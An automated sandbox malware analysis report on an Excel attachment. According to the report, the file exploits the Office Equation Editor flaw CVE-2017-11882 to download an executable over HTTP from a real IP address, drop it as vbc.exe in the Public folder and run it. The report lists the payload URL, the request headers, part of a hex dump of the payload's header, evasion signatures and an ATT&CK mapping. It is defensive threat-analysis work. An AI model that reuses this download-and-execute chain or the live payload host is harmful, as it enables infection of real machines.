Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
_FM_BUSAN_HOCHIMINH_.xlsx

Overview

General Information

Sample Name:_FM_BUSAN_HOCHIMINH_.xlsx
Analysis ID:573118
MD5:9d7bf0f2fbb81660c8b91c2a323fde4e
SHA1:7adf1d60fd08b3accd3a8e58fbdcc674bd1b02ee
SHA256:d60188bc3e17e3fe9a8353a5eb4b791316968f3c1cea1e4e88138718efec0611
Tags:VelvetSweatshopxlsx
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Multi AV Scanner detection for domain / URL
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Drops PE files to the user root directory
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Downloads executable code via HTTP
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Drops PE files to the user directory
Dropped file seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2532 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 1940 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2696 cmdline: "C:\Users\Public\vbc.exe" MD5: 9052D06C6AC53471F8496263F8FEF2EB)
  • cleanup
No configs have been found
No yara matches

Exploits

barindex
Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 198.46.132.195, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1940, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1940, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe

System Summary

barindex
Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1940, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2696
Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1940, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2696
Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 1B 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1940, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: _FM_BUSAN_HOCHIMINH_.xlsxVirustotal: Detection: 38%Perma Link
Source: _FM_BUSAN_HOCHIMINH_.xlsxReversingLabs: Detection: 35%
Source: http://198.46.132.195/ProgramFile/.win32.exeVirustotal: Detection: 6%Perma Link

Exploits

barindex
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.132.195:80
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.132.195:80
Source: excel.exeMemory has grown: Private usage: 4MB later: 66MB
Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox ViewIP Address: 198.46.132.195 198.46.132.195
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 16 Feb 2022 08:11:23 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Thu, 27 Jan 2022 15:00:29 GMTETag: "10b990-5d69194428b49"Accept-Ranges: bytesContent-Length: 1096080Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 be 3e 87 5d 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 d8 08 00 00 a0 07 00 00 00 00 00 96 fe 06 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 11 00 00 04 00 00 8e 81 11 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 35 0b 00 b4 00 00 00 00 d0 0b 00 30 b0 04 00 00 00 00 00 00 00 00 00 00 7c 10 00 90 3d 00 00 00 90 10 00 1c 71 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 a9 09 00 5c 00 00 00 00 00 00 00 00 00 00 00 2c 3b 0b 00 28 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5e d6 08 00 00 10 00 00 00 d8 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ac 6c 02 00 00 f0 08 00 00 6e 02 00 00 dc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 30 4e 00 00 00 60 0b 00 00 0a 00 00 00 4a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 b0 0b 00 00 02 00 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 67 66 69 64 73 00 00 b4 00 00 00 00 c0 0b 00 00 02 00 00 00 56 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 30 b0 04 00 00 d0 0b 00 00 b2 04 00 00 58 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 71 00 00 00 90 10 00 00 72 00 00 00 0a 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global trafficHTTP traffic detected: GET /ProgramFile/.win32.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.132.195Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
Source: vbc.exe.2.dr, .win32[1].exe.2.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: vbc.exe.2.dr, .win32[1].exe.2.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: vbc.exe.2.dr, .win32[1].exe.2.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: vbc.exe.2.dr, .win32[1].exe.2.drString found in binary or memory: http://ocsp.comodoca.com0
Source: vbc.exe.2.dr, .win32[1].exe.2.drString found in binary or memory: http://ocsp.thawte.com0
Source: vbc.exe.2.dr, .win32[1].exe.2.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: vbc.exe.2.dr, .win32[1].exe.2.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: vbc.exe.2.dr, .win32[1].exe.2.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: vbc.exe, 00000004.00000000.473834838.000000000141F000.00000002.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000002.698040978.0000000000230000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.698210832.000000000141F000.00000002.00000001.01000000.00000003.sdmp, vbc.exe.2.dr, .win32[1].exe.2.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/
Source: vbc.exe.2.dr, .win32[1].exe.2.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\87C9FA8A.emfJump to behavior
Source: global trafficHTTP traffic detected: GET /ProgramFile/.win32.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.132.195Connection: Keep-Alive

System Summary

barindex
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exeJump to dropped file
Source: C:\Users\Public\vbc.exeCode function: 4_2_0140092D
Source: C:\Users\Public\vbc.exeCode function: 4_2_0141E13E
Source: C:\Users\Public\vbc.exeCode function: 4_2_013A3DF6
Source: C:\Users\Public\vbc.exeCode function: 4_2_014198F0
Source: C:\Users\Public\vbc.exeCode function: 4_2_01400880
Source: C:\Users\Public\vbc.exeCode function: 4_2_013E574E
Source: C:\Users\Public\vbc.exeCode function: 4_2_013A57BF
Source: C:\Users\Public\vbc.exeCode function: 4_2_01405792
Source: C:\Users\Public\vbc.exeCode function: 4_2_013A3606
Source: C:\Users\Public\vbc.exeCode function: 4_2_01404E15
Source: C:\Users\Public\vbc.exeCode function: 4_2_013A46DE
Source: C:\Users\Public\vbc.exeCode function: 4_2_01405EB0
Source: C:\Users\Public\vbc.exeCode function: String function: 0140BDBF appears 61 times
Source: .win32[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .win32[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .win32[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .win32[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe 736330AAA3A4683D3CC866153510763351A60062A236D22B12F4FE0F10853582
Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
Source: _FM_BUSAN_HOCHIMINH_.xlsxVirustotal: Detection: 38%
Source: _FM_BUSAN_HOCHIMINH_.xlsxReversingLabs: Detection: 35%
Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$_FM_BUSAN_HOCHIMINH_.xlsxJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRFA55.tmpJump to behavior
Source: classification engineClassification label: mal96.expl.winXLSX@4/20@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exeWindow detected: Number of UI elements: 21
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Users\Public\vbc.exeCode function: 4_2_014004C6 push ecx; ret
Source: .win32[1].exe.2.drStatic PE information: section name: .00cfg
Source: vbc.exe.2.drStatic PE information: section name: .00cfg
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exeJump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

Boot Survival

barindex
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1952Thread sleep time: -240000s >= -30000s
Source: C:\Users\Public\vbc.exeCode function: 4_2_014119B9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\Public\vbc.exeCode function: 4_2_0140A9D6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exeCode function: 4_2_014119B9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\Public\vbc.exeCode function: 4_2_013FFC48 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exeCode function: 4_2_01400125 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
Source: C:\Users\Public\vbc.exeCode function: 4_2_0141C3A6 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts12
Exploitation for Client Execution
Path Interception11
Process Injection
111
Masquerading
OS Credential Dumping2
System Time Discovery
Remote Services1
Archive Collected Data
Exfiltration Over Other Network Medium1
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Extra Window Memory Injection
1
Virtualization/Sandbox Evasion
LSASS Memory1
Security Software Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth12
Ingress Tool Transfer
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)11
Process Injection
Security Account Manager1
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
Non-Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Deobfuscate/Decode Files or Information
NTDS1
Remote System Discovery
Distributed Component Object ModelInput CaptureScheduled Transfer21
Application Layer Protocol
SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
Obfuscated Files or Information
LSA Secrets1
File and Directory Discovery
SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common1
Extra Window Memory Injection
Cached Domain Credentials3
System Information Discovery
VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
_FM_BUSAN_HOCHIMINH_.xlsx38%VirustotalBrowse
_FM_BUSAN_HOCHIMINH_.xlsx36%ReversingLabsDocument-OLE.Exploit.CVE-2017-11882
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe1%VirustotalBrowse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe9%MetadefenderBrowse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe0%ReversingLabs
C:\Users\Public\vbc.exe1%VirustotalBrowse
C:\Users\Public\vbc.exe9%MetadefenderBrowse
C:\Users\Public\vbc.exe0%ReversingLabs
SourceDetectionScannerLabelLinkDownload
4.0.vbc.exe.1390000.0.unpack100%AviraHEUR/AGEN.1201751Download File
4.2.vbc.exe.1390000.0.unpack100%AviraHEUR/AGEN.1201751Download File
No Antivirus matches
SourceDetectionScannerLabelLink
https://www.chiark.greenend.org.uk/~sgtatham/putty/0%URL Reputationsafe
https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
http://ocsp.thawte.com00%URL Reputationsafe
http://198.46.132.195/ProgramFile/.win32.exe6%VirustotalBrowse
http://198.46.132.195/ProgramFile/.win32.exe0%Avira URL Cloudsafe
No contacted domains info
NameMaliciousAntivirus DetectionReputation
http://198.46.132.195/ProgramFile/.win32.exetrue
  • 6%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
NameSourceMaliciousAntivirus DetectionReputation
http://crl.thawte.com/ThawteTimestampingCA.crl0vbc.exe.2.dr, .win32[1].exe.2.drfalse
    high
    https://www.chiark.greenend.org.uk/~sgtatham/putty/vbc.exe, 00000004.00000000.473834838.000000000141F000.00000002.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000002.698040978.0000000000230000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.698210832.000000000141F000.00000002.00000001.01000000.00000003.sdmp, vbc.exe.2.dr, .win32[1].exe.2.drfalse
    • URL Reputation: safe
    unknown
    https://www.chiark.greenend.org.uk/~sgtatham/putty/0vbc.exe.2.dr, .win32[1].exe.2.drfalse
    • URL Reputation: safe
    unknown
